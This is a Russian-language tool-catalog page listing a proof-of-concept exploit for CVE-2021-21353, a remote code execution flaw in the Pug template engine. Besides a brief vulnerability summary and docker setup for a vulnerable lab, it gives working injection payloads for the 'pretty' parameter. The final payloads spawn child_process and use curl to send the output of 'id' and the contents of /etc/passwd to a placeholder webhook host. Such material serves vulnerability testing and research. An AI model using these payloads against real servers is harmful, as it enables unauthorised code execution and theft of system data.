Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PUG-RCE-CVE-2021-21353-POC — Эксплойт для проверки концепции для CVE-2021-21353, уязвимости удалённого выполнения кода в шаблонизаторе Pug версий <=3.0.0. Демонстрирует внедрение полезной нагрузки через параметр 'pretty' для выполнения произвольных команд. | Kitploit
Инструменты/GitHubGitHub/jinsu9758/pug-rce-cve-2021-21353-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubjinsu9758/pug-rce-cve-2021-21353-poc

PUG-RCE-CVE-2021-21353-POC

Эксплойт для проверки концепции для CVE-2021-21353, уязвимости удалённого выполнения кода в шаблонизаторе Pug версий <=3.0.0. Демонстрирует внедрение полезной нагрузки через параметр 'pretty' для выполнения произвольных команд.

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PUG-RCE (CVE-2021-21353) POC

Информация об уязвимости

Номер CVE: cve-2021-21353
Оценка CVSS: 8.1

< Уязвимые версии >
pug_version <= 3.0.0
2.0.3 < pug-code-gen version, 3.0.0<= pug-code-gen version < 3.0.2


Настройка окружения

git clone https://github.com/jinsu9758/PUG-RCE-CVE-2021-21353-POC.git
cd PUG-RCE-CVE-2021-21353-POC
sudo docker compose up

※ Доступно по порту 3000


Полезная нагрузка

Тестовая полезная нагрузка
?pretty=');console.log('executed');//

Финальная полезная нагрузка
?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(id)\" <webhook_site>');_=('

?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(cat /etc/passwd)\" <webhook_site>');_=('

Скачать инструмент